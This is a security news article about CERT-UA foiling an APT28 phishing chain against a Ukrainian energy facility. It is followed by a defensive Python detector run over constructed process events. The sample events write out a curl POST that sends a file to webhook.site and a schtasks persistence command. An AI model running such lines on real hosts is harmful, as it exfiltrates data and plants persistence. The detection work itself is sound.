Ukraine’s CERT Foils APT28 Cyberattack Aimed at Energy Infrastructure

September 6, 2023

Ukraine's Computer Emergency Response Team (CERT-UA) reported on Tuesday that it had thwarted a cyber attack on a critical energy infrastructure facility in the country. The attack began with a phishing email containing a link to a malicious ZIP archive, which started the infection chain. CERT-UA stated, "Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file 'weblinks.cmd' to the victim's computer," attributing the attack to the Russian threat actor known as APT28, also tracked as BlueDelta, Fancy Bear, Forest Blizzard, and FROZENLAKE.

When the CMD file is executed, it opens several decoy web pages and writes .bat and .vbs files to disk. The VBS file is then launched, and it in turn runs the BAT file. The next stage runs the 'whoami' command on the compromised host and exfiltrates the output, then downloads TOR and configures a hidden service to route the malicious traffic. Persistence is achieved with a scheduled task, and remote command execution is carried out with cURL through webhook.site, a legitimate request-capture service that was recently revealed to be abused by a threat actor known as Dark Pink.

CERT-UA reported that the attack ultimately failed because access to Mocky, a legitimate mock-API service abused in the chain, was restricted and the Windows Script Host (wscript.exe) was blocked on the targeted host. Notably, APT28 has previously been associated with the abuse of Mocky APIs.
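The chain above, and the two controls CERT-UA credits with stopping it (a blocked wscript.exe and restricted access to Mocky), indicate what a defender would hunt for in process-creation telemetry: cmd.exe launching the Script Host on a script in a user-writable folder, curl.exe posting to a public request-capture or mock-API service, a scheduled task pointing at a script under the user profile, and tor.exe running from a temp directory. The following is an added example written for this page, not CERT-UA's code or indicators: a small Python detector run over constructed Sysmon-style events. The hostnames matched (webhook.site, mocky.io), the paths, the rule names and every sample event are assumptions made for the example, not observed artefacts of this attack.

```python
"""Detection logic over constructed Sysmon-style process-creation events, modelled on
the chain CERT-UA describes: CMD -> VBS via wscript.exe -> BAT, whoami, cURL to a
legitimate web service, TOR download, scheduled-task persistence.
All events, hostnames and rule names below are constructed for illustration."""
import re
from dataclasses import dataclass

# Legitimate services the article says were abused for exfiltration / remote command
# execution.  The exact hostnames are assumptions for the example, not IOCs.
ABUSED_SERVICES = ("webhook.site", "mocky.io")

# Folders a phishing-delivered archive typically lands in and executes from.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData\\Local\\Temp)\\", re.I)


@dataclass
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_script_host_chain(ev: ProcEvent) -> bool:
    """cmd.exe launching the Windows Script Host on a script in a user-writable folder."""
    return (_base(ev.image) == "wscript.exe"
            and _base(ev.parent_image) == "cmd.exe"
            and USER_WRITABLE.search(ev.command_line) is not None)


def rule_curl_to_abused_service(ev: ProcEvent) -> bool:
    """curl.exe talking to a public request-capture / mock-API service."""
    cl = ev.command_line.lower()
    return _base(ev.image) == "curl.exe" and any(h in cl for h in ABUSED_SERVICES)


def rule_schtasks_user_path(ev: ProcEvent) -> bool:
    """schtasks /create whose action lives under the user profile."""
    cl = ev.command_line.lower()
    return (_base(ev.image) == "schtasks.exe" and "/create" in cl
            and USER_WRITABLE.search(ev.command_line) is not None)


def rule_tor_from_user_path(ev: ProcEvent) -> bool:
    """tor.exe started from a user-writable directory (hidden-service plumbing)."""
    return _base(ev.image) == "tor.exe" and USER_WRITABLE.search(ev.image) is not None


RULES = {
    "script_host_chain": rule_script_host_chain,
    "curl_to_abused_service": rule_curl_to_abused_service,
    "schtasks_user_path": rule_schtasks_user_path,
    "tor_from_user_path": rule_tor_from_user_path,
}


def detect(events):
    """Return (rule_name, pid) for every event that matches a rule, in event order."""
    return [(name, ev.pid) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry (not real logs).  PIDs 10, 12 and 16 match no rule:
# the initial cmd.exe and whoami are too generic alone, and PID 16 is benign curl use.
SAMPLE_EVENTS = [
    ProcEvent(10, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\victim\Downloads\weblinks.cmd"'),
    ProcEvent(11, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\victim\AppData\Local\Temp\stage.vbs"'),
    ProcEvent(12, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\whoami.exe", "whoami"),
    ProcEvent(13, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              r"curl -s -X POST https://webhook.site/<token> -d @out.txt"),
    ProcEvent(14, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc minute /mo 5 /tn Updater /tr "C:\Users\victim\AppData\Local\Temp\run.bat"'),
    ProcEvent(15, r"C:\Windows\System32\cmd.exe", r"C:\Users\victim\AppData\Local\Temp\tor\tor.exe",
              r"tor.exe -f torrc"),
    ProcEvent(16, r"C:\Program Files\Git\git-bash.exe", r"C:\Windows\System32\curl.exe",
              r"curl https://example.org/"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Each rule on its own is noisy in a real estate (curl and schtasks are common), so in practice these would be correlated by host and time window, and the hostname list would be replaced by an allow-list of egress destinations enforced at the proxy, which is the control that actually blocked Mocky here.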

The disclosure of this thwarted attack comes amid ongoing phishing campaigns against Ukraine, some of which have been observed using a malware obfuscation engine called ScrubCrypt to deliver AsyncRAT. Another cyberattack, attributed to GhostWriter (also known as UAC-0057 or UNC1151), reportedly exploited a recently disclosed zero-day flaw in WinRAR (CVE-2023-38831, CVSS score: 7.8) to deploy PicassoLoader and Cobalt Strike.
